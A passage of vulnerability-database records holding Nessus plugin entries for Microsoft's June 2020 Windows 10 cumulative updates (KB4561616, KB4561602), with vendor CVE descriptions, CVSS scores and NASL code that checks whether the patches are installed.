or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\");\n # https://support.microsoft.com/en-us/help/4561616/windows-10-update-kb4561616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0526efa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561616.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:14:14", "description": "The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561602: Windows 10 Version 1709 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561602.NASL", "href": "https://www.tenable.com/plugins/nessus/137255", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137255);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561602\");\n script_xref(name:\"MSFT\", value:\"MS20-4561602\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561602: Windows 10 Version 1709 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n 